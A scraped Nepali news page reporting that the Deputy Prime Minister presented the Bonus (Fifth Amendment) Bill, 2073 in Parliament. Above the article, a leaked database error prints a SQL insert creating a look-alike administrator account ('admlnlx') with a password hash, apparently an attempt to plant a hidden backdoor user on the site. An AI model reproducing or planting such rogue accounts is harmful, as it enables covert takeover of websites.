WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bm13UpsvVky2YXGTlzxa8lxceYPj7.1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-02 15:33:31', '', 'admlnlx', 'admlnlx')
काठमाडौँ,माघ ७ –
व्यवस्थापिका–संसद्को आजको बैठकमा उपप्रधानमन्त्री कृष्णबहादुर महराले बोनस ९पाँचौँ संशोधन० विधेयक, २०७३ प्रस्तुत गर्नुभएको छ ।
सदनको आजको बैठकमा सो विधेयक प्रस्तुत गर्दै अर्थमन्त्री महराले उत्पादनलाई प्रतिस्पर्धात्मक बनाउन विधेयक आएको र त्यो पहिलो चरणमा सरकारी निकायमा मात्र लागू हुने बताउनुभयो ।
यसअघि, नेपाल मजदुर किसान पार्टीका प्रेम सुवालले विधेयक समाजवाद उन्मुख नभएकाले फिर्ता लिन सरकारसित आग्रह गर्नुभएको थियो । संसद्को अर्को बैठक यही माघ १० गते अपराह्न १ बजे बस्नेछ । – रासस